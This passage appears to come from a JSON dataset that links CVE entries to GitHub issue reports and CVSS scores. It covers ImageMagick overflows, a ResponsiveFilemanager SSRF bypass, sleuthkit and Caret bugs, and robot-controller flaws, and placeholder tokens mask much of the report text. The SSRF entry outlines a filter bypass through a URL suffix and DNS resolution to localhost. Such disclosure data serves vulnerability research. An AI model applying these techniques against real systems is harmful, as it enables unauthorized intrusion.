  45638. "description": "Advisory from Netsparker APITAG Open Redirection. Hello, While testing the Netsparker web application security scanner we identified an Open Redirection vulnerability in APITAG Can you please advise whom we should contact to disclose the vulnerability details so it can be fixed? Please email me at EMAILTAG for the technical details. Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
  45639. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  45640. "severity": "MEDIUM",
  45641. "baseScore": 6.1,
  45642. "impactScore": 2.7,
  45643. "exploitabilityScore": 2.8
  45644. },
  45645. {
  45646. "CVE_ID": "CVE-2019-9927",
  45647. "Issue_Url_old": "https://github.com/careteditor/issues/issues/862",
  45648. "Issue_Url_new": "https://github.com/careteditor/issues/issues/862",
  45649. "Repo_new": "careteditor/issues",
  45650. "Issue_Created_At": "2019-02-21T17:10:10Z",
  45651. "description": "Remote Code Execution . Title: Caret Version NUMBERTAG rc NUMBERTAG is vulnerable to remote code execution. Description: Caret Version NUMBERTAG rc NUMBERTAG allows the execution of arbitrary APITAG and has the ability to start system processes without user interaction. APITAG Code: ERRORTAG APITAG Code (un evaled): ERRORTAG Screenshot: FILETAG",
  45652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45653. "severity": "CRITICAL",
  45654. "baseScore": 9.8,
  45655. "impactScore": 5.9,
  45656. "exploitabilityScore": 3.9
  45657. },
  45658. {
  45659. "CVE_ID": "CVE-2019-9956",
  45660. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1523",
  45661. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1523",
  45662. "Repo_new": "imagemagick/imagemagick",
  45663. "Issue_Created_At": "2019-03-22T10:37:33Z",
  45664. "description": "stack buffer overflow in APITAG of ps.c. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a stack buffer overflow vulnerability in APITAG of ps.c which could lead to code execution. Steps to Reproduce APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG f2]f2 f2 f NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG a NUMBERTAG APITAG NUMBERTAG b NUMBERTAG aa NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ab NUMBERTAG APITAG NUMBERTAG b NUMBERTAG ac NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff webp wmf x xml zlib Environment APITAG system, version and so on): Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Additional information: APITAG",
  45665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  45666. "severity": "HIGH",
  45667. "baseScore": 8.8,
  45668. "impactScore": 5.9,
  45669. "exploitabilityScore": 2.8
  45670. },
  45671. {
  45672. "CVE_ID": "CVE-2020-10212",
  45673. "Issue_Url_old": "https://github.com/trippo/ResponsiveFilemanager/issues/598",
  45674. "Issue_Url_new": "https://github.com/trippo/responsivefilemanager/issues/598",
  45675. "Repo_new": "trippo/responsivefilemanager",
  45676. "Issue_Created_At": "2020-03-05T05:14:14Z",
  45677. "description": "server side request forgery vulnerability in url uploader bypass CVETAG by adding /favicon.ico to end of php file.. Good afternoon APITAG When i was doing a security test for a client of mine i noticed in your newest version of APITAG NUMBERTAG in NUMBERTAG the url upload is completely broken but it also exist there ) internal server side request forgery by adding to any php APITAG to reproduce this i recommend to install APITAG NUMBERTAG and not APITAG NUMBERTAG because the url file uploader is completely broken and doesn't work at all even with legit jpeg's, but this version is also vulnerable. you need to have url_upload enabled and run the code on a apache server with default configurations. now send as url > FILETAG when you send that go back to the file manager and you will see a ico. download that file and rename favicon.ico to FILETAG . if you now open that you will see the apache status page. as you can see this is a clear indication that CVETAG is bypassable. how does this work: there are a few problems here. first you only use a regex to verify if it is an allowed url. and in php files ( and sometimes html files ) it is allowed to extend the url. this means if i would go to FILETAG /favicon.ico then the apache server would execute index.php and not APITAG but it would extend the url. secondly i use dns pinning to bypass your miner filter to check if you send localhost because if you do a nslookup on NUMBERTAG ip.io\" you will get: bl4ckh4ck5 APITAG laptop:~/$ nslookup NUMBERTAG ip.io Server NUMBERTAG Address NUMBERTAG Non authoritative answer: Name NUMBERTAG ip.io Address NUMBERTAG and NUMBERTAG is localhost, but this method could also be used to access other ip's in the network. 
a while back i created a potential patch against SSRF what might help against this problem: URLTAG but i recommend to make the design client side that the webbrowser downloads the image and then you use a xmlhttprequest to request the normal file upload, because that function isn't vulnerable. i recommend to fix both problems that url upload works again in NUMBERTAG and that you fix this internal server side request forgery. A CVE has already been requested. Dear regards, bl4ckh4ck5 FILETAG",
  45678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45679. "severity": "CRITICAL",
  45680. "baseScore": 9.8,
  45681. "impactScore": 5.9,
  45682. "exploitabilityScore": 3.9
  45683. },
  45684. {
  45685. "CVE_ID": "CVE-2020-10233",
  45686. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1829",
  45687. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1829",
  45688. "Repo_new": "sleuthkit/sleuthkit",
  45689. "Issue_Created_At": "2020-02-14T15:42:50Z",
  45690. "description": "Heap buffer overflow in ntfs_dinode_lookup. Hello sleuthkit team, As part of our fuzzing efforts at Google, we have identified an issue affecting sleuthkit (tested with revision develop APITAG To reproduce, we are attaching a Dockerfile which compiles the project with LLVM, taking advantage of the sanitizers that it offers. More information about how to use the attached Dockerfile can be found here: URLTAG Instructions: ERRORTAG APITAG CODETAG APITAG Alternatively, and depending on the bug, you could use gcc, valgrind or other instrumentation tools to aid in the investigation. The sanitizer error that we encountered is here: ERRORTAG We will gladly work with you so you can successfully confirm and reproduce this issue. Do let us know if you have any feedback surrounding the documentation. Once you have reproduced the issue, we'd appreciate to learn your expected timeline for an update to be released. With any fix, please attribute the report to APITAG Autofuzz project\". We are also pleased to inform you that your project is eligible for inclusion to the OSS Fuzz project, which can provide additional continuous fuzzing, and encourage you to investigate integration options. Don't hesitate to let us know if you have any questions! Google APITAG Team FILETAG",
  45691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  45692. "severity": "CRITICAL",
  45693. "baseScore": 9.1,
  45694. "impactScore": 5.2,
  45695. "exploitabilityScore": 3.9
  45696. },
  45697. {
  45698. "CVE_ID": "CVE-2020-10251",
  45699. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1859",
  45700. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1859",
  45701. "Repo_new": "imagemagick/imagemagick",
  45702. "Issue_Created_At": "2020-03-03T19:01:32Z",
  45703. "description": "out of bounds read in PATHTAG Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description An out of bounds read vulnerability exists within the APITAG function ( PATHTAG ) which can be triggered via an image with width or height in pixel more than length or actual physical size of the image. Steps to Reproduce poc (password: girlelecta): URLTAG cmd: FILETAG convert APITAG FILETAG Upon running this, following crash happens APITAG I enabled page heap on APITAG Microsoft (R) Windows Debugger Version NUMBERTAG Copyright (c) Microsoft Corporation. All rights reserved. APITAG APITAG PATHTAG convert PATHTAG FILETAG Path validation summary Response Time (ms) Location Executable search path is: APITAG NUMBERTAG f NUMBERTAG fb NUMBERTAG image NUMBERTAG f NUMBERTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG ntdll.dll APITAG NUMBERTAG ee NUMBERTAG f NUMBERTAG PATHTAG Page heap: pid APITAG page heap enabled with flags NUMBERTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG ea NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG e NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b5b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG bd NUMBERTAG bec NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG bf NUMBERTAG d4d NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG ab NUMBERTAG bcf NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG df NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG ed NUMBERTAG PATHTAG APITAG NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG APITAG PATHTAG APITAG 
NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG a NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG fe NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG ca NUMBERTAG caf NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG c NUMBERTAG c NUMBERTAG a NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG d7a NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG fb NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG ee NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG c NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG f NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG APITAG NUMBERTAG d NUMBERTAG e NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG APITAG NUMBERTAG a NUMBERTAG PATHTAG APITAG NUMBERTAG b NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG f NUMBERTAG APITAG PATHTAG APITAG NUMBERTAG b7e NUMBERTAG b NUMBERTAG APITAG PATHTAG APITAG Access violation code c NUMBERTAG first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. ERROR: Symbol file could not be found. 
Defaulted to export symbols for APITAG PATHTAG ea NUMBERTAG f0 eb NUMBERTAG ec NUMBERTAG ae NUMBERTAG ed NUMBERTAG c0c0 esi NUMBERTAG a NUMBERTAG c NUMBERTAG edi NUMBERTAG eip NUMBERTAG b NUMBERTAG d esp NUMBERTAG f NUMBERTAG ebp NUMBERTAG e NUMBERTAG iopl NUMBERTAG nv up ei pl nz na po nc cs NUMBERTAG b ss NUMBERTAG ds NUMBERTAG es NUMBERTAG fs NUMBERTAG b gs NUMBERTAG efl NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG fb NUMBERTAG c NUMBERTAG movzx ecx,byte ptr [ecx+eax] ds NUMBERTAG f NUMBERTAG k APITAG APITAG WARNING: Stack unwind information not available. Following frames may be wrong NUMBERTAG f NUMBERTAG dc NUMBERTAG b NUMBERTAG e1 IM_MOD_RL_HEIC NUMBERTAG d ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG f NUMBERTAG f7b NUMBERTAG IM_MOD_RL_HEIC NUMBERTAG e NUMBERTAG f NUMBERTAG c NUMBERTAG f APITAG NUMBERTAG f NUMBERTAG dbfa2 APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG dc3be APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG e APITAG NUMBERTAG f NUMBERTAG c NUMBERTAG db NUMBERTAG d APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG dbaa4 APITAG NUMBERTAG f NUMBERTAG dc NUMBERTAG dbb NUMBERTAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG a NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG APITAG ERROR: Symbol file could not be found. Defaulted to export symbols for APITAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG e NUMBERTAG b NUMBERTAG ed NUMBERTAG APITAG NUMBERTAG c NUMBERTAG MSVCR NUMBERTAG malloc NUMBERTAG System Configuration APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG License: FILETAG Environment APITAG system, version and so on): Distributor ID: Microsoft Windows Description: Windows NUMBERTAG",
  45704. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  45705. "severity": "MEDIUM",
  45706. "baseScore": 5.5,
  45707. "impactScore": 3.6,
  45708. "exploitabilityScore": 1.8
  45709. },
  45710. {
  45711. "CVE_ID": "CVE-2020-10266",
  45712. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1487",
  45713. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1487",
  45714. "Repo_new": "aliasrobotics/rvd",
  45715. "Issue_Created_At": "2020-04-03T14:22:23Z",
  45716. "description": "No integrity checks on UR+ platform artifacts when installed in the robot. ERRORTAG",
  45717. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45718. "severity": "HIGH",
  45719. "baseScore": 8.1,
  45720. "impactScore": 5.9,
  45721. "exploitabilityScore": 2.2
  45722. },
  45723. {
  45724. "CVE_ID": "CVE-2020-10267",
  45725. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/1489",
  45726. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/1489",
  45727. "Repo_new": "aliasrobotics/rvd",
  45728. "Issue_Created_At": "2020-04-03T14:28:43Z",
  45729. "description": "Unprotected intellectual property in Universal Robots controller CB NUMBERTAG across firmware versions. ERRORTAG",
  45730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45731. "severity": "HIGH",
  45732. "baseScore": 7.5,
  45733. "impactScore": 3.6,
  45734. "exploitabilityScore": 3.9
  45735. },
  45736. {
  45737. "CVE_ID": "CVE-2020-10268",
  45738. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2550",
  45739. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2550",
  45740. "Repo_new": "aliasrobotics/rvd",
  45741. "Issue_Created_At": "2020-06-16T17:22:11Z",
  45742. "description": "Terminate Critical Services. ERRORTAG",
  45743. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  45744. "severity": "MEDIUM",
  45745. "baseScore": 6.1,
  45746. "impactScore": 5.2,
  45747. "exploitabilityScore": 0.9
  45748. },
  45749. {
  45750. "CVE_ID": "CVE-2020-10269",
  45751. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2566",
  45752. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2566",
  45753. "Repo_new": "aliasrobotics/rvd",
  45754. "Issue_Created_At": "2020-06-24T04:59:00Z",
  45755. "description": "Hardcoded Credentials on APITAG wireless Access Point. yaml id NUMBERTAG title: Hardcoded Credentials on APITAG wireless Access Point type: vulnerability description: One of the wireless interfaces within APITAG APITAG and possibly (according to the vendor) other APITAG fleet vehicles comes pre configured in APITAG Master APITAG Point) mode. Credentials to such wireless Access Point default to well known and widely spread SSID APITAG and passwords (omitted). This information is also available in past User Guides and manuals which the vendor distributed. We have confirmed this flaw in APITAG and APITAG but it might also apply to APITAG APITAG and APITAG cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD, Autentication system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: Critical cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG FILETAG URLTAG flaw: phase: testing specificity: general issue architectural location: Platform code application: All subsystem: APITAG package: N/A languages: None date detected NUMBERTAG detected by: Bernhard Dieber APITAG Research), Alias Robotics ( URLTAG detected by method: testing dynamic, web browser. date reported NUMBERTAG reported by: APITAG Robotics ( URLTAG further edited by PATHTAG ctor Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45757. "severity": "CRITICAL",
  45758. "baseScore": 9.8,
  45759. "impactScore": 5.9,
  45760. "exploitabilityScore": 3.9
  45761. },
  45762. {
  45763. "CVE_ID": "CVE-2020-10270",
  45764. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2557",
  45765. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2557",
  45766. "Repo_new": "aliasrobotics/rvd",
  45767. "Issue_Created_At": "2020-06-24T04:43:23Z",
  45768. "description": "Hardcoded Credentials on APITAG Control Dashboard. ERRORTAG",
  45769. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45770. "severity": "CRITICAL",
  45771. "baseScore": 9.8,
  45772. "impactScore": 5.9,
  45773. "exploitabilityScore": 3.9
  45774. },
  45775. {
  45776. "CVE_ID": "CVE-2020-10271",
  45777. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2555",
  45778. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2555",
  45779. "Repo_new": "aliasrobotics/rvd",
  45780. "Issue_Created_At": "2020-06-24T04:34:30Z",
  45781. "description": "APITAG ROS computational graph is exposed to all network interfaces, including poorly secured wireless networks and open wired ones. ERRORTAG",
  45782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45783. "severity": "CRITICAL",
  45784. "baseScore": 9.8,
  45785. "impactScore": 5.9,
  45786. "exploitabilityScore": 3.9
  45787. },
  45788. {
  45789. "CVE_ID": "CVE-2020-10272",
  45790. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2554",
  45791. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2554",
  45792. "Repo_new": "aliasrobotics/rvd",
  45793. "Issue_Created_At": "2020-06-24T04:14:56Z",
  45794. "description": "APITAG ROS computational graph presents no authentication mechanisms. ERRORTAG",
  45795. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45796. "severity": "CRITICAL",
  45797. "baseScore": 9.8,
  45798. "impactScore": 5.9,
  45799. "exploitabilityScore": 3.9
  45800. },
  45801. {
  45802. "CVE_ID": "CVE-2020-10273",
  45803. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2560",
  45804. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2560",
  45805. "Repo_new": "aliasrobotics/rvd",
  45806. "Issue_Created_At": "2020-06-24T04:50:27Z",
  45807. "description": "Unprotected intellectual property in Mobile Industrial Robots APITAG controllers. ERRORTAG",
  45808. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  45809. "severity": "HIGH",
  45810. "baseScore": 7.5,
  45811. "impactScore": 3.6,
  45812. "exploitabilityScore": 3.9
  45813. },
  45814. {
  45815. "CVE_ID": "CVE-2020-10274",
  45816. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2556",
  45817. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2556",
  45818. "Repo_new": "aliasrobotics/rvd",
  45819. "Issue_Created_At": "2020-06-24T04:37:32Z",
  45820. "description": "APITAG REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps). ERRORTAG",
  45821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  45822. "severity": "HIGH",
  45823. "baseScore": 7.1,
  45824. "impactScore": 4.2,
  45825. "exploitabilityScore": 2.8
  45826. },
  45827. {
  45828. "CVE_ID": "CVE-2020-10275",
  45829. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2565",
  45830. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2565",
  45831. "Repo_new": "aliasrobotics/rvd",
  45832. "Issue_Created_At": "2020-06-24T04:56:18Z",
  45833. "description": "Weak token generation for the REST API.. ERRORTAG",
  45834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45835. "severity": "CRITICAL",
  45836. "baseScore": 9.8,
  45837. "impactScore": 5.9,
  45838. "exploitabilityScore": 3.9
  45839. },
  45840. {
  45841. "CVE_ID": "CVE-2020-10276",
  45842. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2558",
  45843. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2558",
  45844. "Repo_new": "aliasrobotics/rvd",
  45845. "Issue_Created_At": "2020-06-24T04:45:55Z",
  45846. "description": "Default credentials on SICK PLC allows disabling safety features. ERRORTAG",
  45847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45848. "severity": "CRITICAL",
  45849. "baseScore": 9.8,
  45850. "impactScore": 5.9,
  45851. "exploitabilityScore": 3.9
  45852. },
  45853. {
  45854. "CVE_ID": "CVE-2020-10277",
  45855. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2562",
  45856. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2562",
  45857. "Repo_new": "aliasrobotics/rvd",
  45858. "Issue_Created_At": "2020-06-24T04:52:57Z",
  45859. "description": "Booting from a live image leads to exfiltration of sensible information and privilege escalation. yaml id NUMBERTAG title: Booting from a live image leads to exfiltration of sensible information and privilege escalation type: vulnerability description: There is no mechanism in place to prevent a bad operator to boot from a live OS image, this can lead to extraction of sensible files (such as the shadow file) or privilege escalation by manually adding a new user with sudo privileges on the machine. cwe: CVETAG cve: CVETAG keywords: APITAG APITAG APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD system: APITAG and before, APITAG APITAG APITAG APITAG ER NUMBERTAG ER NUMBERTAG ER Lite, ER Flex, ER One, UVD vendor: Mobile Industrial Robots A/S, APITAG Enabled Robotics, UVD Robots severity: rvss score NUMBERTAG rvss vector: PATHTAG severity description: high cvss score NUMBERTAG cvss vector: PATHTAG links: CVETAG flaw: phase: testing specificity: General Issue architectural location: application specific application: Ubuntu subsystem: N/A package: N/A languages: N/A date detected NUMBERTAG detected by: Lander Usategui, Alfonso Glera APITAG Robotics) detected by method: testing dynamic date reported NUMBERTAG reported by: APITAG Mayoral Vilches APITAG Robotics)\" reported by relationship: security researcher issue: null reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction image: Not disclosed exploitation: description: Not disclosed exploitation image: Not disclosed exploitation vector: Not disclosed exploitation recipe: '' mitigation: description: Not disclosed pull request: Not disclosed date mitigation: null",
  45860. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H",
  45861. "severity": "MEDIUM",
  45862. "baseScore": 6.4,
  45863. "impactScore": 5.5,
  45864. "exploitabilityScore": 0.9
  45865. },
  45866. {
  45867. "CVE_ID": "CVE-2020-10278",
  45868. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2561",
  45869. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2561",
  45870. "Repo_new": "aliasrobotics/rvd",
  45871. "Issue_Created_At": "2020-06-24T04:51:45Z",
  45872. "description": "Unprotected BIOS allows user to boot from live OS image.. ERRORTAG",
  45873. "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  45874. "severity": "MEDIUM",
  45875. "baseScore": 4.6,
  45876. "impactScore": 3.6,
  45877. "exploitabilityScore": 0.9
  45878. },
  45879. {
  45880. "CVE_ID": "CVE-2020-10279",
  45881. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2569",
  45882. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2569",
  45883. "Repo_new": "aliasrobotics/rvd",
  45884. "Issue_Created_At": "2020-06-24T06:00:50Z",
  45885. "description": "Insecure operating system defaults in APITAG robots. ERRORTAG",
  45886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45887. "severity": "CRITICAL",
  45888. "baseScore": 9.8,
  45889. "impactScore": 5.9,
  45890. "exploitabilityScore": 3.9
  45891. },
  45892. {
  45893. "CVE_ID": "CVE-2020-10280",
  45894. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/2568",
  45895. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/2568",
  45896. "Repo_new": "aliasrobotics/rvd",
  45897. "Issue_Created_At": "2020-06-24T05:44:10Z",
  45898. "description": "Apache server is vulnerable to a APITAG ERRORTAG",
  45899. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  45900. "severity": "HIGH",
  45901. "baseScore": 7.5,
  45902. "impactScore": 3.6,
  45903. "exploitabilityScore": 3.9
  45904. },
  45905. {
  45906. "CVE_ID": "CVE-2020-10283",
  45907. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3316",
  45908. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3316",
  45909. "Repo_new": "aliasrobotics/rvd",
  45910. "Issue_Created_At": "2020-06-30T17:20:40Z",
  45911. "description": "RVD NUMBERTAG No authentication in APITAG protocol. ERRORTAG",
  45912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45913. "severity": "CRITICAL",
  45914. "baseScore": 9.8,
  45915. "impactScore": 5.9,
  45916. "exploitabilityScore": 3.9
  45917. },
  45918. {
  45919. "CVE_ID": "CVE-2020-10285",
  45920. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3322",
  45921. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3322",
  45922. "Repo_new": "aliasrobotics/rvd",
  45923. "Issue_Created_At": "2020-07-15T20:55:50Z",
  45924. "description": "Weak authentication implementation make the system vulnerable to a brute force attack over adjacent networks. ERRORTAG",
  45925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45926. "severity": "CRITICAL",
  45927. "baseScore": 9.8,
  45928. "impactScore": 5.9,
  45929. "exploitabilityScore": 3.9
  45930. },
  45931. {
  45932. "CVE_ID": "CVE-2020-10286",
  45933. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3323",
  45934. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3323",
  45935. "Repo_new": "aliasrobotics/rvd",
  45936. "Issue_Created_At": "2020-07-15T21:06:12Z",
  45937. "description": "Mismanaged permission implementation leads to privilege escalation, exfiltration of sensitive information, and APITAG ERRORTAG",
  45938. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  45939. "severity": "HIGH",
  45940. "baseScore": 8.8,
  45941. "impactScore": 5.9,
  45942. "exploitabilityScore": 2.8
  45943. },
  45944. {
  45945. "CVE_ID": "CVE-2020-10287",
  45946. "Issue_Url_old": "https://github.com/aliasrobotics/RVD/issues/3326",
  45947. "Issue_Url_new": "https://github.com/aliasrobotics/rvd/issues/3326",
  45948. "Repo_new": "aliasrobotics/rvd",
  45949. "Issue_Created_At": "2020-07-15T21:59:00Z",
  45950. "description": "Hardcoded default credentials on IRC NUMBERTAG OPC Server. ERRORTAG",
